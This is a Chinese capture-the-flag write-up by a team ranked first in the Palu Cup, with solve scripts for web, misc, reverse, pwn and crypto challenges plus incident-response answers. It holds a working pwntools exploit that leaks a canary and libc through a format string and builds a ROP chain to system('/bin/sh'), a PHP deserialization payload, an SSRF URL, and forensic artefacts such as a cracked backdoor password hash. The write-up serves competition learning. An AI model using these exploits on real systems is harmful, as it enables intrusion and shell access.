帕鲁杯ctf赛题全部解析wp
战队: Ciallo~(∠・ω<)⌒
成员: yuro, 洛ingly, adwa, nyyyddddn 排名: Rank 1
Web[2/4]
R23
简单的反序列化
| class a |
| { |
| public $b; |
| } |
| class b |
| { |
| public $a; |
| public $b; |
| public $c; |
| } |
| class xk |
| { |
| } |
| $inner = new a(); |
| $inner->b = new xk(); |
| $point = null; |
| $obj = new b(); |
| $obj->a = $inner; |
| $obj->b = &$point; |
| $obj->c = &$point; |
| $payload = serialize($obj); |
| print($payload . PHP_EOL); |
# O:1:”b”:3:{s:1:”a”;O:1:”a”:1:{s:1:”b”;O:2:”xk”:0:{}}s:1:”b”;N;s:1:”c”;R:4;}
Web-签到
只要访问的url的response里有paluctf好了
直接http://127.0.0.1:14771/?url=http://127.0.0.1/flag
Misc[4/7]
江
识图即可
flag{湖北省武汉市江汉二路与江汉路步行街交叉路口}
FM 145.8
Misc-签到
| decimal_string = “27880 30693 25915 21892 38450 23454 39564 23460 21457 36865 |
| decimals = map(int, decimal_string.split()) |
| chinese_chars = ”.join([chr(decimal) for decimal in decimals]) | |
| print(chinese_chars) | |
| #注知攻善防实验室发送plbctf获取前段flag关注One-Fox安全团队回复plbctf获取后段flag | |
ez_misc
010提取jpg末尾字符然后snow隐写提取
rar修复压缩文件
Carefree and carefree提取flag
Revervse[5/6]
茶
chacha20,动调发现key最后四个字节去掉了,直接拿下来解密即可
| from Crypto.Cipher import ChaCha20 |
| enc_data = bytes.fromhex(“f568c48912eed6dc520c7164f44b6378e1d0d3e248914fa8847 |
| key = b”SGludDogSW1wcm92ZvZiBTYWxzYTIw” |
| nonce = b”Is_This_” |
| cc = ChaCha20.new(key=key, nonce=nonce) |
| print(cc.decrypt(enc_data)) |
b
flag{But_I_Like_ChaCha20_More}
Auth System
有个tls回调函数,看了一下main函数,有一个很简单的判断身份验证是否成功的函数,跟进去发现是一个异或的逻辑
| int sub_401550() |
| { |
| int ii; // [rsp+28h] [rbp-18h] |
| int n; // [rsp+2Ch] [rbp-14h] |
| int m; // [rsp+30h] [rbp-10h] |
| int k; // [rsp+34h] [rbp-Ch] |
| int j; // [rsp+38h] [rbp-8h] |
| int i; // [rsp+3Ch] [rbp-4h] |
| for ( i = 0; (unsigned __int64)i <= 0x6D; ++i ) |
| putchar(aUuUUuUUuuuUuuu[i] ^ 0xA); |
| putchar(10); |
| for ( j = 0; (unsigned __int64)j <= 0x6D; ++j ) |
| putchar(aTwWTtTTtTWTttw[j] ^ 0xB); |
| putchar(10); |
| for ( k = 0; (unsigned __int64)k <= 0x6D; ++k ) |
| putchar(aPPspPSlPSlPpPS[k] ^ 0xC); |
| putchar(10); |
| for ( m = 0; (unsigned __int64)m <= 0x6D; ++m ) |
| putchar(aQRqQRqQRq11Rrr[m] ^ 0xD); |
| putchar(10); |
| for ( n = 0; (unsigned __int64)n <= 0x6D; ++n ) |
| putchar(aRqrRqrrqqQrrqq[n] ^ 0xE); |
| putchar(10); |
| for ( ii = 0; (unsigned __int64)ii <= 0x6D; ++ii ) |
| putchar(aSpppSpsSppppps[ii] ^ 0xF); |
| return putchar(10); |
| } |
解密得到flag
| a = [0x2A, 0x2A, 0x55, 0x55, 0x2A, 0x55, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, |
| for i in a: |
| byte = i ^ 0xa |
| print(chr(byte),end=””) |
| b = [0x2B, 0x24, 0x2B, 0x54, 0x77, 0x2B, 0x77, 0x2B, 0x54, 0x54, 0x2B, 0x54, |
| for i in b: |
| byte = i ^ 0xb |
0
0
| print(chr(byte),end=””) |
| print() |
| c = [0x70, 0x2C, 0x70, 0x53, 0x70, 0x2C, 0x70, 0x23, 0x2C, 0x53, 0x6C, 0x2C, |
| for i in c: |
| byte = i ^ 0xc |
| print(chr(byte),end=””) |
| print() |
| d = [0x71, 0x2D, 0x2D, 0x52, 0x71, 0x2D, 0x71, 0x2D, 0x25, 0x52, 0x71, 0x2D, |
| for i in d: |
| byte = i ^ 0xd |
| print(chr(byte),end=””) |
| print() |
| e = [0x72, 0x51, 0x72, 0x2E, 0x72, 0x51, 0x72, 0x52, 0x51, 0x51, 0x22, 0x51, |
| for i in e: |
| byte = i ^ 0xe |
| print(chr(byte),end=””) |
0
0
| print() |
| f = [0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, 0x2F, |
| for i in f: |
| byte = i ^ 0xf |
| print(chr(byte),end=””) |
0 0
PyLu pyinstxtractor解包,pycdc反编译出来,直接上z3
| import z3 |
| from Crypto.Util.number import * |
| def enc(key): |
| R = bytes_to_long(b”Welcome To PaluCTF!”) |
| MOD = 2**418 |
| R = R ^ ((R – 60) >> 24) |
| R = R ^ ((R – 60) << 88) |
| R ^= key |
| R = (-R * R * 2024) % MOD |
| R = (R * key) % MOD |
| return R |
| res = 0x2E441F765514CCA89173554726494D37E9FBE774B6F807BC5F6E71117530CE3D7DB5F |
| s = z3.Solver() |
| key = z3.BitVec(“key”, 418) |
| s.add(enc(key) == res) |
| s.check() |
| m = s.model() |
| flag = long_to_bytes(m[key].as_long()) |
| print(flag) |
7
flag{e88f88d7-4d75-462b-8447-bf4ab7aeab1a} 帕鲁被病毒攻击了
图片修复长宽,得到压缩包密码palubei@2024#01
然 后 010 翻
983179bdb58ea980ec1fe7c45f63571d49b140bdd629f234be9c00a6edd8a4a7/layer
.tar
看到个很像flag的东西,提交过了
flag{0n3_n00b_ru1n5_0n3_hundr3d_pr05} O2 elf header被修改了,将EI_CLASS改为2即可修复(1是32位,2是64位)
分析一下sub_25C0,实际上一个加法和取模运算
爆一下行了
| from string import printable |
| enc = bytearray.fromhex(“364d4d5c3e387e00421c597a0a7302144d5b70087e0646195673 |
3
| key = “PaluCTF” |
| for i in range(len(enc)): |
| for c in printable: |
| if (ord(c) + ord(key[i % len(key)])) % 128 == enc[i]: |
| print(c, end=””) |
| break |
flag{d80a0d76-23af-486e-a0bc-43a463eac552}
Pwn[1/2]
Palu glibc 2.23 盲猜栈相关的漏洞
please input name这里有一个格式化字符串,用这个格式化字符串泄露canary和libc基地址
| puts(“Please tell me your name”); |
| read(0, buf, 0x5DuLL); |
| printf(buf); |
然后用base64decode里面的gift打rop好了
| unsigned __int64 __fastcall decode_palu64(const char *a1) |
| { |
| char *v1; // rax |
| int v2; // eax |
| int v3; // eax |
| int v4; // eax |
| char *s; // [rsp+8h] [rbp-68h] |
| int v7; // [rsp+20h] [rbp-50h] |
| int i; // [rsp+24h] [rbp-4Ch] |
| size_t v9; // [rsp+30h] [rbp-40h] |
| char *haystack; // [rsp+38h] [rbp-38h] |
| int v11; // [rsp+40h] [rbp-30h] |
| int v12; // [rsp+44h] [rbp-2Ch] |
| int v13; // [rsp+48h] [rbp-28h] |
| int v14; // [rsp+4Ch] [rbp-24h] |
| char buf[24]; // [rsp+50h] [rbp-20h] BYREF |
| unsigned __int64 v16; // [rsp+68h] [rbp-8h] |
| s = (char *)a1; |
| v16 = __readfsqword(0x28u); |
| v9 = (3 * strlen(a1)) >> 2; |
| haystack = (char *)malloc(v9 + 1); |
| if ( haystack ) |
| { |
| v7 = 0; |
| while ( *s ) |
| { |
| for ( i = 0; i <= 3; ++i ) |
| { |
| v1 = s++; |
| *(&v11 + i) = palu64_decode((unsigned int)*v1); |
| } |
| v2 = v7++; |
| haystack[v2] = (4 * v11) | (v12 >> 4); |
| if ( v13 <= 63 ) |
| { |
| v3 = v7++; |
| haystack[v3] = (16 * v12) | (v13 >> 2); |
| } |
| if ( v14 <= 63 ) |
| { |
| v4 = v7++; |
| haystack[v4] = ((_BYTE)v13 << 6) | v14; |
| } |
| } |
| haystack[v7] = 0; |
| if ( strstr(haystack, “Palu”) ) |
| { |
| puts(“A small gift”); |
| read(0, buf, 0xC8uLL); |
| } |
| printf(“Decoded string: %s\n”, haystack); |
| free(haystack); |
| } |
| else |
| { |
| puts(“Memory allocation failed.”); |
| } |
| return __readfsqword(0x28u) ^ v16; |
| } |
exp
| from pwn import * |
| # from LibcSearcher import * |
| import itertools |
| import ctypes |
| context(os=’linux’, arch=’amd64′, log_level=’debug’) |
| is_debug = 0 |
| IP = “127.0.0.1” |
| PORT = 40875 |
| elf = context.binary = ELF(‘./Palu’) |
| libc = elf.libc |
| def connect(): |
| return remote(IP, PORT) if not is_debug else process() |
| g = lambda x: gdb.attach(x) |
| s = lambda x: p.send(x) |
| sl = lambda x: p.sendline(x) |
| sa = lambda x, y: p.sendafter(x, y) |
| sla = lambda x, y: p.sendlineafter(x, y) |
| r = lambda x=None: p.recv() if x is None else p.recv(x) |
| rl = lambda: p.recvline() |
| ru = lambda x: p.recvuntil(x) |
| r_leak_libc_64 = lambda: u64(p.recvuntil(b’\x7f’)[-6:].ljust(8, b’\x00′)) |
| r_leak_libc_32 = lambda: u32(p.recvuntil(b’\xf7′)[-4:]) |
| p = connect() |
| payload = b”-%23$p-%25$p” |
| sla(“Please tell me your name”,payload) |
| ru(“-“) |
| canary = int(r(18),16) |
| success(f”leak_canary ->{hex(canary)}”) |
| ru(“-“) |
| libc_base = int(r(14),16) – (0x7ee1fd620840 – 0x7ee1fd600000) |
| success(f”libc_base ->{hex(libc_base)}”) |
| system = libc_base + libc.sym[‘system’] |
| binsh = libc_base + next(libc.search(b’/bin/sh’)) |
| rdi = 0x00000000004010a3 |
| ret = 0x0000000000400761 |
| Palu_base64encode = “UGFsdQ==” # Palu |
| sla(“Please tell me your options”,”2″) |
| sla(“Enter a palu64 string to decode: “,Palu_base64encode) |
| payload = b’a’ * (0x20 – 8) + p64(canary) |
| payload += b’a’ * 8 + p64(ret) + p64(rdi) + p64(binsh) + p64(system) |
| sla(“A small gift”,payload) |
p.interactive()
Crypto[9/9] peeeq
https://www.zhihu.com/question/628747685?
utm_medium=social&utm_psn=1764759313145401345&utm_source=qq 得到leak=phi-1
然后后面找个板子打可以了
https://lazzzaro.github.io/2021/10/15/match-
2021%E5%B9%B4%E4%B8%AD%E5%9B%BD%E8%83%BD%E6%BA%90%E7%BD%91%E7%
BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/#NumberGame
| import gmpy2 |
| from itertools import product |
| from Crypto.Util.number import * |
| “”” |
| alpha = p’ * q’ – l |
| beta = l^2 * [(e * d – 1) / s] + q’ * l + p’ * l – p’ * q’ – alpha – l^2 |
| i.e.: |
| beta = l^2 * {[(e * d – 1) / s] – 1} + l * (q’ + p’) – alpha – p’ * q’ |
| if l,s are correct: |
| alpha = k * t |
| beta = k * (p’ – l) + t * (q’ – l) |
| i.e: |
| “”” |
| def alpha_from_pprime_qprime_l(pprime, qprime, l): |
| return pprime * qprime – l |
| def beta_from_pprime_qprime_e_d_l_s_alpha(pprime, qprime, e, d, l, s, alpha): |
| temp1 = e * d – 1 |
| assert temp1 % s == 0 |
| temp2 = ((temp1 // s) – 1) * l * l |
| temp3 = temp2 + l * (pprime + qprime) |
| return temp3 – alpha – (pprime * qprime) |
| def k_t_from_pprime_qprime_l_alpha_beta(pprime, qprime, l, alpha, beta): |
| a = pprime – l |
| b = -beta |
| c = alpha * (qprime – l) |
| disc = b * b – 4 * a * c |
| assert gmpy2.is_square(disc) |
| temp = -b + gmpy2.isqrt(disc) |
| assert temp % (2 * a) == 0 |
| k = temp // (2 * a) |
| assert alpha % k == 0 |
| return k, alpha // k |
| def brute_k_t_l(pprime, qprime, e, d): |
| # l, s = 2, 2 |
| ss = [s for s in range(e – 100000, e + 1000000) if s != 0 and (e * d – 1) |
| for l, s in product(range(1, 5000), ss): |
| # print(f’l = {l}, s = {s}’) |
| try: |
| alpha = alpha_from_pprime_qprime_l(pprime, qprime, l) |
| beta = beta_from_pprime_qprime_e_d_l_s_alpha( |
| pprime, qprime, e, d, l, s, alpha |
| ) |
| k, t = k_t_from_pprime_qprime_l_alpha_beta(pprime, qprime, l, alp |
| return k, t, l |
| except AssertionError: |
| continue |
| if __name__ == “__main__”: |
| # leak=p*q-p-q |
| leak = 206509139700728687599592722396040242974208068086591105643120517368 |
| pinv_e = 1247414037877104386502214884807813693646507980006613023461898310 |
| qinv_e = 1647206449953560407401595632741127506095799998014240087894866808 |
| e = GCD(pinv_e, qinv_e) // 3 |
| fn = leak + 1 |
| d = gmpy2.invert(e, fn) |
| pprime = pinv_e // e |
| qprime = qinv_e // e |
| k, t, l = brute_k_t_l(pprime, qprime, e, d) |
| lp, lq = qprime + k, pprime + t |
| assert lp % l == 0, lq % l == 0 |
| p, q = lp // l, lq // l |
| assert gmpy2.invert(p, q) == pprime, gmpy2.invert(q, p) == qprime |
| assert gmpy2.is_prime(p), gmpy2.is_prime(q) |
| N = p * q |
| c = 146564996837884613196017100888314128921945052544180648997614986792977 |
| flag_decoded = pow(c, d, N) |
h 0
4
9
6
| print(long_to_bytes(flag_decoded)) |
| #b’paluctf{51b98a17-6843-4e3b-b06c-3cd956bc944c}’ |
gcccd
https://affine.group/writeup/2021-01-Zer0pts#warsamup
原题我直接用HGCD加速打了
| from Crypto.Util.number import * |
| def HGCD(a, b): |
| if 2 * b.degree() <= a.degree() or a.degree() == 1: |
| return 1, 0, 0, 1 |
| m = a.degree() // 2 |
| a_top, a_bot = a.quo_rem(x^m) |
| b_top, b_bot = b.quo_rem(x^m) |
| R00, R01, R10, R11 = HGCD(a_top, b_top) |
| c = R00 * a + R01 * b |
| d = R10 * a + R11 * b |
| q, e = c.quo_rem(d) |
| d_top, d_bot = d.quo_rem(x^(m // 2)) |
| e_top, e_bot = e.quo_rem(x^(m // 2)) |
| S00, S01, S10, S11 = HGCD(d_top, e_top) |
| RET00 = S01 * R00 + (S00 – q * S01) * R10 |
| RET01 = S01 * R01 + (S00 – q * S01) * R11 |
| RET10 = S11 * R00 + (S10 – q * S11) * R10 |
| RET11 = S11 * R01 + (S10 – q * S11) * R11 |
| return RET00, RET01, RET10, RET11 |
| def GCD(a, b): |
| print(a.degree(), b.degree()) |
| q, r = a.quo_rem(b) |
| if r == 0: |
| return b |
| R00, R01, R10, R11 = HGCD(a, b) |
| c = R00 * a + R01 * b |
| d = R10 * a + R11 * b |
| if d == 0: |
| return c.monic() |
| q, r = c.quo_rem(d) |
| if r == 0: |
| return d |
| return GCD(d, r) |
| n = 1281341552009003635573617701216482367475596637385914180414438615455614518 |
| e = 5331 |
| c1 = 606689460794231907098514842474338537832383810432117132589503365723925731 |
| c2 = 430643715351466107862028137366743686182500342747687378576278727770517458 |
8
9
| R.= PolynomialRing(Zmod(n)) |
| f=(2*x + 1)**e – c1 |
| g=x**e – c2 |
| sol=GCD(f,g) |
| m = 2*(-sol.monic()(0)) + 1 |
| print(long_to_bytes(int(m))) |
| #b’\x01\xe4\xfd\x02.\xd3=Dre\xf9C\xa7P\x9c\x92\xbb.|\x1c-\x9fx”\x14\xe7G\x97\ |
| #flag{6a096839-3ccb-46b4-9eb0-841ca85c0f63} |
8 x
lcccg
https://zenn.dev/kurenaif/articles/f9d3f56e1d3235#the_onetime_pad
https://github.com/kurenaif/kurenaif_valentine_problems/blob/main/the_onetime_pad/problem.py 原题直接抄他代码了
| from fractions import Fraction |
| from Crypto.Util.number import * |
| def get_x(cipher, pos, m, length): |
| hoge = [] |
| while cipher > 0: |
| hoge.append(cipher % 2) |
| cipher >>= 1 |
| while len(hoge) < length: |
| hoge.append(0) |
| hoge = hoge[pos + 1 :] |
| low = Fraction(0, 1) |
| high = Fraction(m, 1) |
| for i in range(len(hoge)): |
| mid = (low + high) / 2 |
| if hoge[i] == 0: |
| high = mid |
| else: |
| low = mid |
| return low.__ceil__(), high.__floor__() |
| def challenge(cipher, length, m, x): |
| inv2 = pow(2, -1, m) |
| xs = [0] * (length + 1) |
| xs[length] = x |
| for i in range(length, 0, -1): |
| xs[i – 1] = xs[i] * inv2 % m |
| rand = 0 |
| for i in range(length): |
| rand += (xs[i] & 1) << i |
| num = ((1 << length) – 1) & (cipher ^ rand) |
| if b”paluctf” in long_to_bytes(num): |
| print(long_to_bytes(num)) |
| m = 7870528503754256659 |
| length = 311 |
| cipher = 32558152602384315848291327734794474088178501852296596484042082680012 |
| low, high = get_x(cipher, length, m, length + 50) |
| print(high – low) |
| for x in range(low, high + 1): |
| challenge(cipher, length, m, x) |
| #b’paluctf{1_am_a_l0ng_l3g1n_1s_n0t_a_l!!}’ |
5
01110
2023浙江省赛原题
| import gmpy2 |
| from Crypto.Util.number import * |
| c = […] |
| n = 3906436609154007593560286731491682795606870930353029741839097841191389036 |
| gift1 = 320676301451944861978698980827928814863454072008418253909408260894272 |
| gift2 = 360493111446954743089613557546255044580147549879914031885888612983915 |
| z = 1256420081357146151802130962491371520531152500515226176773143587482373107 |
| p = GCD(gift1 + gift2, n) |
| q = int(gmpy2.iroot(n // p, 2)[0]) |
| def GM_decode(c, p, q): |
| if pow(c, (p – 1) // 2, p) == 1 and pow(c, (q – 1) // 2, q) == 1: |
| return 0 |
| else: |
| return 1 |
| m = “” |
| for i in c: |
| m += str(GM_decode(i, p, q)) |
| m = m[::-1] |
3
3
8
1
| print(long_to_bytes(int(m, 2))) |
| #b’paluctf{1_4m_th3_b0td_1n_t3st_1n_th3_r0w}’ |
Simple_Crypto
https://www.t00ls.com/articles-49265.html
原题序列都不用算,完全一样的直接用他的板子
| from bintools import * |
| class LFSR: |
| def __init__(self,keyt,feedpath): |
| self.trigger = [] |
| self.feedback = [] |
| self.degree = len(keyt) |
| self.feed = len(feedpath) |
| if len(feedpath) != self.degree: |
| return None |
| for i in keyt: |
| self.trigger.append(i) |
| for i in feedpath: |
| self.feedback.append(i) |
| def binxor(self,bin1,bin2): |
| if bin1 == bin2: |
| return ‘0’ |
| else: |
| return ‘1’ |
| def getfeed(self): |
| self.realdback = [] |
| for i in range(self.feed): |
| if self.feedback == ‘1’: |
| self.realdback.append(self.trigger) |
| for i in range(1,len(self.realdback)): |
| self.realdback[0] = self.binxor(self.realdback[0],self.realdback) |
| return self.realdback[0] |
| def tick(self): |
| outpin = self.trigger[-1] |
| feedpin = self.getfeed() |
| for i in range(self.degree-1,0,-1): |
| self.trigger = self.trigger[i-1] |
| self.trigger[0] = feedpin |
| return outpin |
| def getenbin(thisobj): |
| tenbin = ” |
| for i in range(8): |
| tenbin += thisobj.tick() |
| print(‘\t%s’%tenbin,end=”) |
| return ord(BinToStr(tenbin)) |
| if ‘__main__’ == __name__: |
| newobj = LFSR(‘10110111101100111111101010011’,’00001000000000000111111100 |
| fr = open(‘challenge.png.encrypt’,’rb+’) |
| string = fr.read() |
| fr.close() |
| newstring = ” |
| for i in range(len(string)): |
| newstring += chr(string^getenbin(newobj)) |
| fw = open(‘lfsr.png.encrypt’,’wb+’) |
| fw.write(newstring.encode(encoding=”latin1″)) |
| fw.close() |
| print (“\nOk……”) |
0
玛卡巴卡有什么坏心思呢网上有密码表
| “a”: “玛卡巴卡轰“, |
| “b”: “阿巴雅卡轰“, |
| “c”: “伊卡阿卡噢轰“, |
| “d”: “哈姆达姆阿卡嗙轰“, |
| “e”: “咿呀呦轰“, |
| “f”: “玛卡雅卡轰“, |
| “g”: “伊卡阿卡轰“, |
| “h”: “咿呀巴卡轰“, |
| “i”: “达姆阿卡嗙轰“, |
| “j”: “玛卡巴卡玛卡巴卡轰“, |
| “k”: “玛卡巴卡玛卡巴卡玛卡巴卡轰“, |
| “l”: “玛卡巴卡玛卡巴卡玛卡巴卡玛卡巴卡轰“, |
| “m”: “阿巴雅卡阿巴雅卡轰“, |
| “n”: “阿巴雅卡阿巴雅卡阿巴雅卡轰“, |
| “o”: “阿巴雅卡阿巴雅卡阿巴雅卡阿巴雅卡轰“, |
| “p”: “伊卡阿卡噢伊卡阿卡噢轰“, |
| “q”: “伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰“, |
| “r”: “伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢伊卡阿卡噢轰“, |
| “s”: “哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰“, |
| “t”: “哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰“, |
| “u”: “哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙哈姆达姆阿卡嗙轰“, |
| “v”: “咿呀呦咿呀呦轰“, |
| “w”: “咿呀呦咿呀呦咿呀呦轰“, |
| “x”: “咿呀呦咿呀呦咿呀呦咿呀呦轰“, |
| “y”: “咿呀呦咿呀呦咿呀呦咿呀呦咿呀呦轰“, |
| “z”: “玛卡雅卡玛卡雅卡轰“, |
| “A”: “玛卡雅卡玛卡雅卡玛卡雅卡轰“, |
| “B”: “玛卡雅卡玛卡雅卡玛卡雅卡玛卡雅卡轰“, |
| “C”: “伊卡阿卡伊卡阿卡轰“, |
| “D”: “伊卡阿卡伊卡阿卡伊卡阿卡轰“, |
| “E”: “伊卡阿卡伊卡阿卡伊卡阿卡伊卡阿卡轰“, |
| “F”: “咿呀巴卡咿呀巴卡轰“, |
| “G”: “咿呀巴卡咿呀巴卡咿呀巴卡轰“, |
| “H”: “咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡轰“, |
| “I”: “咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡咿呀巴卡轰“, |
| “J”: “达姆阿卡嗙达姆阿卡嗙轰“, |
| “K”: “达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰“, |
| “L”: “达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰“, |
| “M”: “达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙达姆阿卡嗙轰“, |
| “N”: “巴卡巴卡轰“, |
| “O”: “巴卡巴卡巴卡巴卡轰“, |
| “P”: “巴卡巴卡巴卡巴卡巴卡巴卡轰“, |
| “Q”: “巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡轰“, |
| “R”: “巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡巴卡轰“, |
| “S”: “呀呦轰“, |
| “T”: “呀呦呀呦轰“, |
| “U”: “呀呦呀呦呀呦轰“, |
| “V”: “呀呦呀呦呀呦呀呦轰“, |
| “W”: “呀呦呀呦呀呦呀呦呀呦轰“, |
| “X”: “达姆阿卡轰“, |
| “Y”: “达姆阿卡达姆阿卡轰“, |
| “Z”: “达姆阿卡达姆阿卡达姆阿卡轰“, |
| “0”: “达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰“, |
| “1”: “达姆阿卡达姆阿卡达姆阿卡达姆阿卡达姆阿卡轰“, |
| “2”: “玛巴轰“, |
| “3”: “玛巴玛巴轰“, |
| “4”: “玛巴玛巴玛巴轰“, |
| “5”: “玛巴玛巴玛巴玛巴轰“, |
| “6”: “巴卡玛巴轰“, |
| “7”: “巴卡玛巴巴卡玛巴轰“, |
| “8”: “巴卡玛巴巴卡玛巴巴卡玛巴轰“, |
| “9”: “巴卡玛巴巴卡玛巴巴卡玛巴巴卡玛巴轰“, |
| “=”: “妈个巴子轰“, |
| “/”: “妈个巴卡轰“, |
| “+”: “妈个巴达轰“, |
对着即可撸出来 jinitaimei
然后加个flag头即可两元钱的铜匠
sylvester结试直接爆
| from Crypto.Util.number import * |
| from sage.matrix.matrix2 import Matrix |
| def resultant(f1, f2, var): |
| return Matrix.determinant(f1.sylvester_matrix(f2, var)) |
| n = 8091635113228513692133671416685940224851812567342194406669021036315794868 |
| c = 2273030193022095581013239780940648550443099888328424747689074475981175930 |
| N = 1758873395746433719423603969130197351184239283913397977510490498168623440 |
| leak = 1611774884845796805031272983208748235398588950818589804504272981201825 |
| P.= PolynomialRing(Zmod(N)) |
| a=pow(9999, 66666,N) |
| b=pow(66666, 9999,N) |
| f1 = a*x+b*y-leak |
| f2 = x*y-n |
1
1
9
5
| hx = resultant(f1, f2, y) |
| rx = hx.univariate_polynomial().roots() |
| x, _ = zip(*rx) |
| p=int(x[1]) |
| q=n//p |
| e=65537 |
| d=inverse(e,(p-1)*(q-1)) |
| print(long_to_bytes(int(pow(c,d,n)))) |
| #b’paluctf{6699669966996699669966996699}’ |
Crypto-签到 nc进去拿数据 d出不了用dp
| import gmpy2 |
| from Crypto.Util.number import * |
| c = 1697082756231533018355466609903675961030374295211204263031780026667052588 |
| p = 6783866621664404311360631748289003038812476986464692488622430519698072975 |
| e = 65537 |
| n = 4602084634053241810281719471033587845035847645724919524419315162252291794 |
| q = n // p |
| d = gmpy2.invert(e, (p – 1) ) |
| print(long_to_bytes(pow(c, d, p))) |
1
9
江枫渔火对愁眠 dfs+剪枝
| from Crypto.Util.number import * |
| n1 = 116117067844956812459549519789301338092862193317140117457423221066709482 |
| leak1 = 860508104958398243829844050792007658706919618546380065818879967785709 |
| leak2 = 134073731541518151875086455563326143499981098203613871043176590966661 |
| c = 7739189801802586650465235728588687168650609049277507596485606072669726847 |
| a_list, b_list = [0], [0] |
| import itertools |
| cur_mod = 1 |
| for i in range(512): |
| cur_mod *= 2 |
| nxt_as, nxt_bs = [], [] |
| for al, bl in zip(a_list, b_list): |
| for ah, bh in itertools.product([0, 1], repeat=2): |
| aa, bb = ah * (cur_mod // 2) + al, bh * (cur_mod // 2) + bl |
| if (aa * bb % cur_mod == n1 % cur_mod) and ((aa & bb) == leak1 % |
| nxt_as.append(aa) |
| nxt_bs.append(bb) |
9
c
| a_list, b_list = nxt_as, nxt_bs |
| for a, b in zip(a_list, b_list): |
| if a * b == n1 and a * b – n1 == 0 and (a & b) – leak1 == 0 and ((aa | bb |
| break |
| p=a |
| q=b |
| e=65537 |
| d=inverse(e,(p-1)*(q-1)) |
| print(long_to_bytes(pow(c,d,n1))) |
| #b’paluctf{&&&|||&&&|||&&&&&&&&&&&&|||||||||}’ |
)
应急响应[49/52]
应急响应-01 — solved 找到JumpServer堡垒机中flag标签的值。
[BrYeaVj54009rDIZzu4O]
应急响应-02 — solved
提交攻击者第一次登录时间。
[2024/04/11/14:21:18]
应急响应-03 — solved
提交攻击者源IP。
jumpserver里直接翻
[192.168.1.4]
应急响应-04 — solved
提交攻者使用的cve编号。 jumpserver的cve
solved
提交攻击者留在Web服务器上的恶意程序的32位小写md5值。
登上palu.com用户后可以直接sudo
直接md5sum home
[84413332e4e7138adc5d6f1f688ddd69]
应急响应-06 — solved
分析恶意程序连接地址和密码。
/root/home
[e695461c231aee4ed46b201efca18ff8-7da188c2e2d83e38b7d9e75e500f1af8]
应急响应-07 — solved
提交存在反序列化漏洞的端口。猜的
应-08 — solved
提交攻击者使用的后门路由地址。
— solved 提交dnslog反弹域名。
[0vqkht.palu.cn] 应急响应-10 提交第一次扫描器使用时间。应急响应-11 — solved 提交攻击者反弹shell使用的语言。猜的
-12 — solved 提交攻击者反弹shell的ip。
[82.157.238.174]
应急响应-13 — solved
提交攻击者留下的账号。
[palu.com]
应急响应-14 — solved
提交攻击者的后门账户密码。
palu.com:$6$DQ8D3GcMdpWGs4KE$eBm2bLXdKP.NYLPp5HS7HrzNDVBVT8WSKCXhHF1Cly o4UaauojMtBg5StloDidMV9RsNhmcR3bmgltslfZuxL1:19828:0:99999:7::: 直接用john爆 -15 — solved
提交测试数据条数。
急响应-16 — solved
请提交攻击者留下的信息。
flag{hi_palu_f10g}
应急响应-17 — solved 请提交运维服务器上的恶意文件md5(小写32位md5值)。
[0fca0f847a45401c878d7a5303ddc1f8]
应急响应-18 — solved
提交恶意文件的恶意函数。
恶意函数为 begingame
[ddd0599cda1fc289a617db148d75383b]
应急响应-19 — solved
请提交攻击者恶意注册的恶意用户条数。
响应-20
请提交对博客系统的第一次扫描时间。 waf里可以翻到
[2024-04-16 21:03:46]
应急响应-21 — solved
提交攻击者下载的文件。
[upload.zip]
应急响应-22 — solved
请提交攻击者第一次下载服务器文件的时间。
[16/Apr/2024:09:03:52] 应急响应-23 — solved
请提交攻击者留下的冰蝎马的文件名称。
[nidewen.php]
应急响应-24 — solved
提交冰蝎的链接密码。
文件名
-25 — solved
提交办公区存在的恶意用户名。看看用户
-26 — solved
提交恶意用户密码到期时间。 cmd执行net user hacker
[2024/5/28/21:40:37]
应急响应-27 — solved
请对办公区留存的镜像取证并指出内存疑似恶意进程。 vol取证 pslist [.hack.ex]
应急响应-28 — solved
请指出该员工使用的公司OA平台的密码。
从raw.raw中dump出password.txt可以得到 — solved
攻击者传入一个木马文件并做了权限维持,请问木马文件名是什么。翻到了原题,直接交了
[h4ck3d!]
应急响应-30 — solved
请提交该计算机中记录的重要联系人的家庭住址。原题,实际应该是有个王总.contact,里面应该有地址 [秋水省雁荡市碧波区千屿山庄1号] 应急响应-31 — solved
请提交近源靶机上的恶意文件哈希。
开机弹出来了,恶意文件为artifact.exe
[a7fcd0b15a080167c4c2f05063802a6e]
应急响应-32 — solved
提交恶意程序的外联地址。 vt扫一下可以得到了
[101.78.63.44]
应急响应-33 — solved
提交攻击者使用内网扫描工具的哈希。查命令记录发现有使用过fscan md5sum webserver上的fscan [1facdcd05c43ba4d37274dffc90b6d4e]
应急响应-34 — solved
请提交攻击者在站点上留下的后门密码。
后门密码为123
[202cb962ac59075b964b07152d234b70]
应急响应-35 — solved
请提交攻击者在数据库留下的信息。
[flag{hack_palu}]
应急响应-36 — solved 提交攻击者在监控服务器上留下的dcnlog地址。
[palu.dcnlog.cn]
应急响应-37 — solved
提交监控服务器上恶意用户的上一次登录时间。
[2024/04/17/01:32:44]
应急响应-38 — solved
提交监控服务器上遗留的反弹shell地址和端口。
应急响应-39 — solved
提交恶意钓鱼文件的哈希。
【通知】第一届“帕鲁杯–应急响应挑战赛(初稿)”.docx为恶意钓鱼文件
[da75025ff7f3b6baa27f5913c1c83063] 应急响应-40 提交恶意文件外连IP。应急响应-41 — solved
提交被恶意文件钓鱼使用者的姓名。
[陈琚鹭] 应急响应-42 — solved
